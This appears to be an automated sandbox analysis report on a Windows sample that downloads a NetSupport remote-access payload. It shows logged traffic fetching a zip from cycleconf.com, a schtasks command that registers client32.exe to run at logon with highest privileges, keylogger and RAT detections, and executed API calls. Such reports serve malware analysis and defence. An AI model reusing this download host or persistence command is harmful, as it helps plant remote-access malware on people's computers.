2024-12-10 07:57:24 UTC	8000	IN	Data Raw: f0 b6 be 3c 51 ba 71 8f fe bd 88 37 bf d3 8b 1b 23 cd 6d 51 4b 52 d6 cc b8 36 d1 7f f1 c1 dd d3 7a 7d 51 f3 ed be 69 dd 5f be e4 77 f9 58 ad b6 39 7d d5 78 d9 80 7f 1e bd be ef f4 c9 ec 49 33 8b 43 9f aa 5b 7e e2 25 d9 9a f7 b7 c4 4d f2 6d f0 fe b6 c7 07 fd 82 ba 74 0b af d9 a1 2b bd 62 36 52 2a 69 d7 5e bf d6 73 3f 4c 6c 93 95 0f 0d 9c f4 04 5d 20 91 17 0d 2d 4f c9 7b 79 ec 73 1b 97 9d bb 17 f3 79 cf 7e b1 9f 7e c5 be b5 6c e5 da db f7 96 b5 64 54 59 a9 68 ce 53 74 ee de a9 1d 1b 2f 3e db f5 3f 3c 90 5b f2 d9 b3 67 de ca 9f 3e 2e 3b ee a9 d5 27 9f 59 5d 1c bb aa e7 fe ff ab 0f e4 1c 53 05 e3 b6 3f 7e 98 fd ae e6 7c 5d f2 b4 69 7b f6 77 37 3f a5 ea 3b f5 8b 4f 62 8c 31 9f 54 df 78 dc 7d 6e cd 8c 74 e6 b4 b9 77 c9 5e 86 1b 77 cd e7 fc e4 1e 83 7a 05 5d 2a Data Ascii: <Qq7#mQKR6z}Qi_wX9}xI3C[~%Mmt+b6Ri^s?Ll] -O{ysy~~ldTYhSt/>?<[g>.;'Y]S?~\|]i{w7?;Ob1Tx}ntw^wz]
2024-12-10 07:57:25 UTC	8000	IN	Data Raw: 4a 2e d3 1c fd 50 74 b4 52 03 e3 23 72 5f aa 1f 36 76 9b 0f e6 c5 1a 8e 59 a2 c9 e9 a3 cf fc 3a 39 13 53 85 c4 d4 a4 31 f9 52 a1 58 92 c2 9c 9c 10 93 c2 ea 87 19 20 56 9a be 36 9b 83 b1 59 f6 23 b9 76 1c cc 96 45 68 64 86 34 ca 35 f0 15 c5 3e e5 d3 6e e6 ff d0 df de 7e e8 91 e4 5d 17 a5 e4 55 58 10 62 18 4c 0d c0 c6 63 7e e5 63 cb 7d e6 7b c5 4b 24 a9 8e 36 36 19 19 19 d6 c9 5d dd 5a c3 fb b8 4d ea cc 84 94 d4 34 9b 18 71 92 0d d4 07 ae 62 b8 86 e1 f2 45 ab 37 12 81 d1 98 fd 68 8c 67 0d e9 98 a0 6b cc 24 12 75 0a 16 88 4d ea aa 63 e4 f9 3e ff b0 03 38 ac b4 7f d0 85 04 d3 42 8a eb 93 48 9d 54 32 06 7a 6d 66 4a 3e 99 04 b8 e4 f9 8d b3 18 2f f7 4b f6 8f a8 67 18 ee bb 7d a9 dd 76 f3 9a 3d 3f fd 5a a2 61 60 9d 70 74 e3 c9 4b 5f b6 b0 c3 c6 3c 48 9e 10 55 5e Data Ascii: J.PtR#r_6vY:9S1RX V6Y#vEhd45>n~]UXbLc~c}{K$66]ZM4qbE7hgk$uMc>8BHT2zmfJ>/Kg}v=?Za`ptK_<HU^
2024-12-10 07:57:25 UTC	8000	IN	Data Raw: 8d c2 0b 44 39 0f 52 79 6c 77 2d 54 44 e1 29 62 0b 25 4b 7e 68 5b 0f 31 6f 8f c1 3b 8d 66 d1 62 78 60 38 45 96 b5 12 07 b6 22 4a 58 36 5e 52 b1 99 b6 ad 9a 84 b6 32 66 57 59 78 37 b4 f4 80 ee 64 85 69 26 27 5d 4e 8a 22 e5 ec 95 64 0c 48 fd 0c de 34 d1 30 97 c2 53 34 19 9a d2 8f 3e 80 20 a4 36 93 76 97 76 91 21 e0 73 08 fa 27 c0 cc e4 b8 cb 71 91 ba 6c c9 3c ca ec 60 0f b0 bd 6c c5 ad 4d 40 d1 20 39 51 f4 01 0a c6 86 cf fb c3 05 8f 92 22 42 d3 23 0b d9 e9 39 19 91 19 04 ee f8 a1 3d 70 95 c9 88 58 aa ab 07 aa c0 42 74 40 11 fb c5 57 0c 74 15 c9 c4 a8 73 a3 d6 e7 d1 a1 0f 9d 0d 73 dd 2c 98 1b 60 30 b7 4b 87 b9 6b 0a c8 13 e7 eb 56 e3 85 fa 7c bc 30 e0 e2 05 25 01 2f cc a6 e3 85 55 0c 28 56 2d a0 54 d2 e1 99 00 59 5f 84 97 e4 f5 a5 74 68 ab 4a eb 97 40 18 37 Data Ascii: D9Rylw-TD)b%K~h[1o;fbx`8E"JX6^R2fWYx7di&']N"dH40S4> 6vv!s'ql<`lM@ 9Q"B#9=pXBt@Wtss,`0KkV\|0%/U(V-TY_thJ@7
2024-12-10 07:57:25 UTC	559	IN	Data Raw: 00 20 00 00 00 00 00 00 00 50 43 49 43 48 45 4b 2e 44 4c 4c 0a 00 20 00 00 00 00 00 01 00 18 00 00 03 cc 01 20 a0 d1 01 61 c9 ee ed 5b 37 da 01 cd 15 5c 8c 17 35 da 01 50 4b 01 02 1f 00 14 00 00 00 08 00 24 a0 cd 56 00 ef 64 fe d7 7f 00 00 58 f7 00 00 0e 00 24 00 00 00 00 00 00 00 20 00 00 00 61 1f 00 00 72 65 6d 63 6d 64 73 74 75 62 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 2a 32 6a a6 18 9e d9 01 85 83 92 f3 5b 37 da 01 9a b4 5c 8c 17 35 da 01 50 4b 01 02 1f 00 14 00 00 00 08 00 19 92 38 57 f5 75 1d 3a 91 01 00 00 7d 02 00 00 0c 00 24 00 00 00 00 00 00 00 20 00 00 00 64 9f 00 00 63 6c 69 65 6e 74 33 32 2e 69 6e 69 0a 00 20 00 00 00 00 00 01 00 18 00 30 ba bb 24 fa ee d9 01 6a 23 97 b5 5b 37 da 01 e5 1a 6e 1e 72 ee d9 01 50 4b 01 02 1f 00 14 00 00 Data Ascii: PCICHEK.DLL a[7\5PK$VdX$ aremcmdstub.exe *2j[7\5PK8Wu:}$ dclient32.ini 0$j#[7nrPK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49712	23.254.224.41	443	5272	C:\Users\user\Desktop\lFxGd66yDa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 07:57:26 UTC	55	OUT	GET /dwnld/2nd2_4.zip HTTP/1.1 Host: cycleconf.com
2024-12-10 07:57:26 UTC	263	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 07:57:26 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 24 Jul 2024 21:12:34 GMT Accept-Ranges: bytes Content-Length: 787082 Vary: Accept-Encoding Content-Type: application/zip
2024-12-10 07:57:26 UTC	7929	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 2c 61 87 4f 09 a5 f9 52 62 03 00 00 00 0a 00 00 0a 00 00 00 6e 65 74 6d 73 67 2e 64 6c 6c ed 56 4d 48 54 51 14 fe de cc 18 8d 7f 18 44 d1 aa 27 18 d5 a2 c1 89 0a 83 50 33 15 14 ff 50 b3 08 a1 5e 33 af 71 c2 79 33 bd 37 96 1a c8 04 12 41 06 d6 22 5a 56 bb 16 d5 2c 5a 68 10 b4 6c 63 8b 56 15 51 d1 a2 5d b5 6d 11 d6 77 cf dc 19 5f a3 22 41 bb 3a 8f 73 7f be 7b fe ee 39 f7 bd fb 7a 4f cd 23 08 20 44 fe f9 13 58 40 81 5a b1 31 29 d9 da 9d 4f 6b f1 24 bc 54 bf 60 f4 2c d5 0f 8f 25 3d 33 e3 a6 13 ae 95 32 63 96 e3 a4 b3 e6 59 db 74 27 1c 33 e9 98 ed fd 43 66 2a 1d b7 23 35 35 95 0d da c6 c1 2b 47 3e 5c f8 38 38 57 64 fb fa c3 b9 8c f4 03 37 54 3f 98 8c 8d 29 bc dc f7 40 07 d0 63 04 f0 f8 71 df 93 22 f6 11 81 fa 2a a3 76 ab 4c 36 fb Data Ascii: PK,aORbnetmsg.dllVMHTQD'P3P^3qy37A"ZV,ZhlcVQ]mw_"A:s{9zO# DX@Z1)Ok$T`,%=32cYt'3Cf#55+G>\88Wd7T?)@cq"vL6
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: 29 26 9d 8f b0 e0 73 a5 31 b7 d2 58 be 0c aa fb 33 15 dd 2c 44 77 ec ae 01 aa fb 73 2d d3 7f bd 4b ae 2e 9f 6c bf 8a 13 2a ec 93 6b bc 4d 5b f8 09 56 58 69 c3 df a8 b9 7e 64 e1 3e 39 b7 d4 1a 35 4e 74 b8 cc 95 a3 fd bf 55 21 dc 08 71 fb 5d 89 ad fc 3b 6d 2b 8f 91 8b 17 9a 45 6f 66 b1 c7 70 a4 88 74 a3 a9 93 59 c2 2c ec 1e 65 cc 9c fd 41 cb d9 f1 3b e5 6a 99 39 a5 3e 29 aa f3 17 6d a1 df dd a9 a9 ce 5f b5 d5 11 58 ae 00 f2 ee df 21 53 e3 4f ea 10 0b ef 4c ec 10 af 69 3b c4 14 96 d9 cf f5 48 9a 27 1a 54 1e c5 58 8e 0b b7 b7 f0 6e 71 1f 79 04 f7 43 5d a1 e8 ae 3c 5a 14 7a 48 79 19 28 cc 4e 95 fe 0a a4 ff 87 bc 44 bd ef af ec 7b b4 b2 fa 6e 5e 12 bb aa 61 61 6a b6 4f 0b be 98 81 27 ee 37 5f df 79 40 af d9 5f 8c 34 5d 66 fb 21 f0 c2 d6 4d 15 97 f0 8e 5d 6b be Data Ascii: )&s1X3,Dws-K.l*kM[VXi~d>95NtU!q];m+EofptY,eA;j9>)m_X!SOLi;H'TXnqyC]<ZzHy(ND{n^aajO'7_y@_4]f!M]k
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: d5 6e 7b e3 b9 3f 96 97 b6 a4 e8 af 9a fa d2 6e 9b a2 f3 f6 ef 0f 79 5f a6 e8 0f 25 7c d2 ac 42 1c 9a 80 6f 08 4c a5 8b 98 1c 8d 5c 72 fb 6f 4e 6e ff ff 8b f6 a0 f6 2b 1d a7 11 fd ed e1 95 e4 f3 ef d8 4b 0f ee 0f 15 87 c8 cc 0a 6a 5d d5 7c ab 61 40 10 f6 7b 61 c5 e2 3b e2 3d 3c ea be 05 d9 ca 69 72 c4 1e 1f ca 86 fa 9b 66 18 39 b1 e9 20 09 f7 f0 8f 9b e8 af 48 39 7a 1e b7 be 8c a0 39 07 1c bb 57 99 04 40 dc e3 15 1f 37 37 7d a6 8f 1a 73 85 50 8f 1c 8f 07 21 5c 9f 87 dd c5 f2 03 3c 51 68 68 34 34 c2 f8 c7 6e 7a 16 70 39 c0 52 8d 07 27 c5 7b 8c e2 7c 1e 73 0d dd 86 ee 68 e6 f0 9c 66 03 b4 40 1f 68 33 2d 52 04 af 8a 70 d7 ea dc 1b f4 9c c1 79 1e e0 f1 f2 91 b5 3d ab 66 37 5d d6 8b 6f 1b 0e 19 0e 15 79 dc e2 05 a1 e4 3c 99 00 30 e2 01 03 bd 09 3b 27 d4 13 1c Data Ascii: n{?ny_%\|BoL\roNn+Kj]\|a@{a;=<irf9 H9z9W@77}sP!\<Qhh44nzp9R'{\|shf@h3-Rpy=f7]oy<0;'
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: 3c 78 45 af 9d 2a 36 9d 4f d6 cd a6 84 55 1c 46 7b b6 54 d4 c7 01 ff 35 e9 fb 88 4f 87 a6 ef cc 72 8a 72 99 8b 0d 40 70 c9 e7 74 7d 14 1b 41 27 e2 10 e8 5b dc e5 92 ff d9 1d 5b 1f 6f 09 ef 92 79 b8 fb cd 83 8d 10 7e 1a c3 f3 90 ae ab 96 24 51 7e 38 1d 96 4c 0c 5f e2 e4 31 0e d0 65 84 79 0f 0c 67 a1 35 44 9b d1 cd e6 9f 99 51 f4 3a a4 e2 6c f9 3b 60 b6 a6 b3 da 73 02 63 dc 16 85 cd 3f dc 5f b1 73 1d 59 6d 76 f7 4f 3b 1a 8b 17 f6 1f f4 4f 82 f9 7b 98 0f 76 df 54 bc 6e 5a 8e 37 97 7b 54 2f ec 98 48 b7 69 f8 a3 de 51 96 1a d5 bd fc a5 42 90 8d dd 4d 37 c0 89 a1 8e 80 09 d4 86 6e c1 08 32 b4 c3 a9 a4 60 2a 10 22 97 5b 69 0b 86 0d d5 ca 26 9a 77 e5 09 ac 4e 85 75 c0 bd 2e 1b af 42 21 b7 50 c8 2c 0c dc c9 cb 56 f4 dc 6e c0 eb 32 58 8f 7e bd 3c b9 5f 12 5c 28 f0 Data Ascii: <xE6OUF{T5Orr@pt}A'[[oy~$Q~8L_1eyg5DQ:l;`sc?_sYmvO;O{vTnZ7{T/HiQBM7n2`"[i&wNu.B!P,Vn2X~<_\(
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: 98 f1 e0 99 c0 3c 06 1f 82 35 8e ac dc 59 9c c7 1a 16 52 0a 28 4c 9f 61 05 14 b0 f1 2a 60 a3 c9 fd 3b 73 8f 89 26 06 dc 74 04 6e 3a 00 97 dc 57 7d 08 28 03 23 1a 95 cf 96 e5 4d 84 b5 27 8c f1 41 1e f9 9d 43 c8 41 e8 53 70 b6 33 23 14 36 a7 38 11 f6 7f c6 a8 c4 eb 79 2d 69 4e 90 f7 75 c6 cb fb 8e 26 0d 29 ef 83 d5 1d 00 6b 69 8b e2 e1 dd 92 34 17 62 16 6c 59 01 cf e7 97 7f 89 e2 2f fa 94 6f a6 bc 97 58 d1 2b 1e 98 0a 69 07 0a f0 e9 c3 e7 32 7c 0a 20 6d b8 24 5c ab f2 b5 f3 85 dc a6 60 64 f9 ca 91 bc ef a1 2b 74 dc 2f 15 b1 23 7b 7e 03 e3 af 5c 82 53 39 43 39 8c 11 be e5 2d 51 36 8c 92 b4 67 e9 70 35 80 58 cc 3b 7c ce ed 48 9f 6a e7 e4 aa d7 ed e5 c3 c2 73 50 03 8f d4 01 94 92 34 99 3e b7 c3 68 90 7b 17 3b 18 e8 4a 1b bb d1 63 6f f2 d4 29 70 c4 c4 dc 75 33 Data Ascii: <5YR(La*`;s&tn:W}(#M'ACASp3#68y-iNu&)ki4blY/oX+i2\| m$\`d+t/#{~\S9C9-Q6gp5X;\|HjsP4>h{;Jco)pu3
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: 7f b8 b4 50 75 69 b4 07 66 75 23 ce aa 65 1f b6 18 97 eb b8 9a 2b a4 54 9a c3 e8 4d 07 27 08 fb 1a c6 39 d6 45 ef 9c 82 15 59 74 64 79 ae 66 33 76 8a 57 3b f5 74 9c 2b 8f 51 04 f1 ad 6a 06 09 a4 56 ad 4e 32 08 c2 a0 f1 1c 28 b3 16 82 b1 02 a7 1b c1 cb b7 06 ac 96 1e a9 62 17 79 35 78 75 6c 79 ca be b1 30 78 9f 56 7c 83 30 57 52 7b 33 ee 48 90 c2 13 2c aa c9 e2 5f 01 02 e3 e2 7d 2b 60 ec 7e 6e 86 0f f1 8e 2a 3e 2d 1e 20 5d 88 bb 5f 8e f7 60 50 61 06 8f d9 1d 94 93 0b 9d 04 09 39 5c 53 71 35 ad c0 49 96 65 73 35 20 2b 15 4b 7b 67 94 3d 11 b8 dd e5 f2 eb a5 e2 d5 0e 37 fa df b3 9c c0 63 38 f7 9b 43 e4 90 68 43 ab fe d3 b4 54 8b fd 09 fd 85 7f d2 1f 33 ca 9e e4 42 c0 6f 60 b1 ca 1f 7b dc f2 7c 28 76 44 2d 06 16 ad ac d8 6f 40 bb 7f ef 38 6e af 7d 75 d3 bb c6 Data Ascii: Puifu#e+TM'9EYtdyf3vW;t+QjVN2(by5xuly0xV\|0WR{3H,_}+`~n*>- ]_`Pa9\Sq5Ies5 +K{g=7c8ChCT3Bo`{\|(vD-o@8n}u
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: 0a 48 b7 96 7b 5a 6c 09 41 ee d5 5f 24 2c 21 15 90 8b 5a ee e9 b1 25 04 b9 ef 8f 07 64 b2 0a 48 44 cb 7c 57 6c 09 41 e6 89 09 80 98 55 40 7a b5 dc 77 47 73 1b 20 f7 27 17 e3 01 31 ab 4b 28 ba e0 66 24 2e b8 a6 8b 71 80 b4 ab 08 13 5d 14 79 89 8b 62 e3 c5 78 40 7a 87 31 40 58 e8 06 50 de 8e e6 ee 86 ed ce 9b 00 88 3c 8c 01 92 ad e5 b6 46 73 9f 85 dc 33 e2 01 61 27 f3 d3 db 73 b4 cc b3 62 80 40 e6 11 09 80 1c 66 80 a8 0d ed 81 86 b6 4f 7a 13 69 ff 64 d8 9f 30 79 c7 30 ac 52 5b 75 50 64 bb 01 33 69 e4 17 cb 19 59 39 53 b4 dc ea 94 f8 72 ab b1 9c 39 be dc 32 2c 97 c1 ca 65 bd 09 f6 38 65 cd 58 d6 1b c4 b5 a2 e3 42 3f 85 38 40 8b 86 c5 6d 47 c2 a8 17 f4 10 c3 59 cc 84 2c 17 56 d0 0c 0d 21 da c9 b2 e6 a8 7f a5 60 e3 b0 5f 06 df 1d 96 7c a8 29 92 0c c7 1f 5e 4c Data Ascii: H{ZlA_$,!Z%dHD\|WlAU@zwGs '1K(f$.q]ybx@z1@XP<Fs3a'sb@fOzid0y0R[uPd3iY9Sr92,e8eXB?8@mGY,V!`_\|)^L
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: 20 66 51 54 9f da 20 68 77 e1 79 78 bb 01 1e 46 78 98 e0 61 86 47 c6 65 f0 f2 91 75 19 e2 03 76 c5 24 65 93 50 df 21 0f 97 85 30 4e 5b 03 2e f9 4a 67 34 8f f0 ce 3a fb 03 96 13 2d a9 86 5a bb de fa 26 c4 94 49 82 00 b6 fb d8 a6 5e 4c 49 76 06 69 cf 7d 03 e4 58 61 7b da 39 0a 94 f5 15 e1 ba dc a6 14 f8 29 da 47 c3 7a 7f 91 d9 81 97 19 69 81 b1 f4 54 9e 65 39 12 ac 30 dd 25 66 c2 d1 9d 7b ae 49 2c 31 4a 0b 86 eb c5 22 73 5e 66 36 5e a1 bd 07 12 4b f5 3e 4b 5b ad 5c e8 9f 5f 11 2a 03 62 5f 29 01 3b 45 ab 02 4a 86 ac 36 33 f7 0c b8 17 72 cb 1f 3d a4 09 b7 26 b1 fa 34 32 90 a9 c5 d0 70 cb 47 b4 3c c2 bb 78 a1 4a 4a 4c db 50 2a f5 e6 84 13 d5 ef 9e 7f 53 51 aa 0f 21 5b a5 ba 73 0f 2a fa c0 84 60 fe b4 ab 40 44 6e a3 0b 37 f9 55 ae fe f8 4b 48 a4 4b 32 e0 e2 3b Data Ascii: fQT hwyxFxaGeuv$eP!0N[.Jg4:-Z&I^LIvi}Xa{9)GziTe90%f{I,1J"s^f6^K>K[\_b_);EJ63r=&42pG<xJJLPSQ![s*`@Dn7UKHK2;
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: 04 3c 3a aa 59 be 54 c6 9a 5b e9 bf 53 f4 df bb ca 00 7d 9d ea ae f5 89 fb 01 44 ec 74 5b 7a c4 c0 2e 6b 8b 70 43 de 74 08 e4 29 8c 07 b7 c0 6e b7 d2 06 5a 36 d7 31 bd 9a fc 79 94 8f 13 46 c3 dd 08 d3 58 fd f8 39 cd 44 66 97 cb 29 7f 0e d4 bf 1d 82 07 d8 76 f1 2e b7 58 ba 5b c9 34 bd c9 f6 9a d1 4b 46 68 6a ae fb d4 42 1e f2 aa b5 e5 b1 59 74 15 d2 71 8b fa bb 1d 75 e9 10 e8 8e 0b 63 e9 5f d0 91 1a 99 f7 c4 e2 c0 f0 bc 07 16 70 35 10 39 c0 5e dd 04 1e f2 ac dd 2b 5f 27 a5 bb 83 af 29 2e 79 0f 65 38 82 af 82 94 d8 7a 95 ab f9 17 9a 2d f0 f4 3f d1 b6 51 b4 6d 12 6d 9b 45 db 56 d1 b6 43 0d d1 5d 28 95 ec f1 eb 9c 34 41 6e 7c 8e 79 fa aa c8 d0 49 81 3d 81 64 29 70 4a 2c 33 8b 65 26 b1 2c 4b 2c cb 16 cb 8c 10 98 09 05 c3 61 3b b8 d3 d7 85 ed 86 9c 6d c3 74 72 Data Ascii: <:YT[S}Dt[z.kpCt)nZ61yFX9Df)v.X[4KFhjBYtquc_p59^+_').ye8z-?QmmEVC](4An\|yI=d)pJ,3e&,K,a;mtr
2024-12-10 07:57:27 UTC	8000	IN	Data Raw: b5 98 a0 88 64 96 e7 c4 bb 35 40 db 2e 63 6b 9f 81 44 f7 d5 2d 66 07 0f 7e 2d 7a 08 95 7a 5e 09 a4 c4 2a d4 76 a0 55 5e cb 76 b1 10 6e a7 85 f0 c9 17 09 ea 58 2e d4 b3 19 eb 61 4f be 8e b5 c2 2f 96 e8 65 6b b1 57 5e ba 7e 13 a2 c1 08 d4 5d 2c 36 d4 af 20 4a 0c df 8f 6a bd 18 9e 2f ee 2e c4 61 c0 06 ec 6c 81 08 38 b1 0f 46 e4 d9 4a da 1a 4f 81 81 59 2c 8a 61 ef b1 e6 f4 83 3d 97 be 43 41 cc c3 0e c4 5c 8e 86 1e 32 6a e7 58 73 e0 23 c2 9a eb db 6c ec bb e3 2f a1 1e bf 9d 35 1c 7f b1 c7 37 69 49 fa ae 85 59 26 37 ff d1 bd 51 85 29 f3 52 36 72 dd bb 63 81 7b f7 9e 43 cf 2c b6 fe fa d8 78 7b 04 b7 1c fe c6 a0 84 a8 a7 3f eb a0 55 d0 82 6d 0e d1 33 33 68 28 1e 6d 07 6e 8f e8 2c 12 5f d8 87 7d d0 0b 68 d6 db 98 af 10 06 1e 8b 21 f4 f2 f6 42 2f 9d a2 35 2a d6 31 Data Ascii: d5@.ckD-f~-zz^vU^vnX.aO/ekW^~],6 Jj/.al8FJOY,a=CA\2jXs#l/57iIY&7Q)R6rc{C,x{?Um33h(mn,_}h!B/51

Target ID:	0
Start time:	02:57:13
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\lFxGd66yDa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lFxGd66yDa.exe"
Imagebase:	0x190000
File size:	5'112'587 bytes
MD5 hash:	ECFDDE187846C27FEF59C61D42D474B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2217114600.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:57:28
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
Imagebase:	0x9b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:57:28
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\DNScache\client32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\DNScache\client32.exe
Imagebase:	0x400000
File size:	55'456 bytes
MD5 hash:	9497AECE91E1CCC495CA26AE284600B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\client32.exe, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:57:28
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:57:29
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\DNScache\client32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\DNScache\client32.exe
Imagebase:	0x400000
File size:	55'456 bytes
MD5 hash:	9497AECE91E1CCC495CA26AE284600B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.2%
Total number of Nodes:	1561
Total number of Limit Nodes:	24

Executed Functions

Function 00191A80 Relevance: 96.8, APIs: 20, Strings: 35, Instructions: 535
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00191E2D
lstrlenW.KERNEL32(00000000), ref: 00191E34
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 00191E46
RegCloseKey.ADVAPI32(?), ref: 00191E4F
GetProcessHeap.KERNEL32(00000008,0000020A,7622F380,00000000,00000000), ref: 00191E73
HeapAlloc.KERNEL32(00000000), ref: 00191E76
GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00191E88
GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00191EA3
HeapAlloc.KERNEL32(00000000), ref: 00191EA6
wsprintfW.USER32 ref: 0019204E
GetProcessHeap.KERNEL32(00000008,0000020A), ref: 0019205E
HeapAlloc.KERNEL32(00000000), ref: 00192061
wsprintfW.USER32 ref: 00192449
ShellExecuteW.SHELL32(00000000,runas,?,?,00000000,00000000), ref: 0019246A
GetProcessHeap.KERNEL32(00000000,?), ref: 00192478
HeapFree.KERNEL32(00000000), ref: 0019247B
GetProcessHeap.KERNEL32(00000000,?), ref: 00192480
HeapFree.KERNEL32(00000000), ref: 00192483
GetProcessHeap.KERNEL32(00000000,?), ref: 0019248D
HeapFree.KERNEL32(00000000), ref: 00192490

Strings

invalid literal/length code, xrefs: 00192326
L, xrefs: 0019216E
z, xrefs: 00191F4A
>, xrefs: 001921EE
L, xrefs: 001920DE
cmd.exe, xrefs: 0019222A
L, xrefs: 001921F8
L, xrefs: 0019219E
L, xrefs: 0019210E
runas, xrefs: 00192073, 00192463
C, xrefs: 001921BC
N, xrefs: 001921D0
I, xrefs: 001921A8
$, xrefs: 00192206
/c "%s", xrefs: 00192104
", xrefs: 00192126
?, xrefs: 00191F65
%s\schtasks.exe, xrefs: 00191AA6
L, xrefs: 001921E4
y, xrefs: 00191F14
%, xrefs: 001921FF
invalid distance code, xrefs: 001923F0
#, xrefs: 0019213E
$, xrefs: 00191C77
b, xrefs: 00191EDE
N, xrefs: 001921B2
l, xrefs: 00192069
/create /sc ONLOGON /tn "%s" /tr "%s" /RL HIGHEST, xrefs: 00191C58, 00191EEF
p, xrefs: 00191F2F
#, xrefs: 00192156
?, xrefs: 0019220D
b, xrefs: 00191EF9
i, xrefs: 00191F80
need dictionary, xrefs: 0019229A
;, xrefs: 00191C05

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: Heap$Process$AllocFree$wsprintf$CloseDirectoryExecuteOpenShellSystemValuelstrlen
